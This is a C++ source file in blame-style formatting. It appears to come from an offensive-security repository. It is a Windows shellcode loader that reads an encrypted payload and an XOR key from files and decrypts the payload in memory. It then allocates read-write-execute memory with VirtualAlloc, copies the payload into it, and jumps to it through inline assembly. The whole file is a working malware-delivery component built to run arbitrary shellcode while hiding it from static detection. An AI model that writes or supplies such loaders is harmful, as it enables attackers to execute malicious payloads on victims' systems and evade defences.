2024-01-02 22:06:07 +01:00
|
|
|
#include <windows.h>
|
2024-01-06 12:53:18 +01:00
|
|
|
|
2024-01-02 22:06:07 +01:00
|
|
|
#include <iostream>
|
2024-01-06 12:53:18 +01:00
|
|
|
|
2024-01-05 20:02:01 +01:00
|
|
|
#include "../shared/crypto.hpp"
|
2024-01-06 12:53:18 +01:00
|
|
|
#include "../shared/futils.hpp"
|
2024-01-02 22:06:07 +01:00
|
|
|
|
|
|
|
#define VERBOSE 1
|
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
int main(int argc, char **argv) {
|
|
|
|
if (argc != 3) {
|
2024-01-08 21:17:37 +01:00
|
|
|
std::cout << "\nUsage: " << argv[0] << " <shellcode-path> <xor-keyfile-path>\n"
|
|
|
|
<< std::endl;
|
2024-01-06 12:53:18 +01:00
|
|
|
return 1;
|
|
|
|
}
|
2024-01-02 22:06:07 +01:00
|
|
|
|
|
|
|
#ifdef VERBOSE
|
2024-01-06 12:53:18 +01:00
|
|
|
std::cout << "[+] Reading shellcode from " << argv[1] << std::endl;
|
2024-01-02 22:06:07 +01:00
|
|
|
#endif
|
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
auto shellcodeContents = ReadFromFile(argv[1]);
|
2024-01-02 22:06:07 +01:00
|
|
|
|
2024-01-05 20:02:01 +01:00
|
|
|
#ifdef VERBOSE
|
2024-01-06 12:53:18 +01:00
|
|
|
std::cout << "[+] Reading XOR key from " << argv[2] << std::endl;
|
2024-01-05 20:02:01 +01:00
|
|
|
#endif
|
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
auto key = ReadFromFile(argv[2]);
|
2024-01-02 22:06:07 +01:00
|
|
|
|
2024-01-05 20:02:01 +01:00
|
|
|
#ifdef VERBOSE
|
2024-01-06 12:53:18 +01:00
|
|
|
std::cout << "[+] XOR'ing shellcode" << std::endl;
|
2024-01-05 20:02:01 +01:00
|
|
|
#endif
|
2024-01-02 22:06:07 +01:00
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
XorCipher(&shellcodeContents, key);
|
2024-01-02 22:06:07 +01:00
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
auto baseAddress = VirtualAlloc(nullptr, shellcodeContents.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
|
2024-01-02 22:06:07 +01:00
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
if (!baseAddress) {
|
|
|
|
std::cout << "[!] Failed to allocate memory" << std::endl;
|
|
|
|
return 1;
|
|
|
|
}
|
2024-01-02 22:06:07 +01:00
|
|
|
|
|
|
|
#ifdef VERBOSE
|
2024-01-06 12:53:18 +01:00
|
|
|
std::cout << "[+] Allocated " << shellcodeContents.size() << " bytes at " << baseAddress << std::endl;
|
2024-01-02 22:06:07 +01:00
|
|
|
#endif
|
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
std::copy(shellcodeContents.begin(), shellcodeContents.end(), static_cast<char *>(baseAddress));
|
2024-01-02 22:06:07 +01:00
|
|
|
|
|
|
|
#ifdef VERBOSE
|
2024-01-06 12:53:18 +01:00
|
|
|
std::cout << "[+] Copied shellcode to " << baseAddress << std::endl;
|
|
|
|
std::cout << "[+] Executing 'jmp " << baseAddress << "'" << std::endl;
|
2024-01-02 22:06:07 +01:00
|
|
|
#endif
|
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
__asm__("jmp *%0" ::"r"(baseAddress));
|
2024-01-02 22:06:07 +01:00
|
|
|
|
2024-01-06 12:53:18 +01:00
|
|
|
return 0;
|
2024-01-02 22:06:07 +01:00
|
|
|
}
|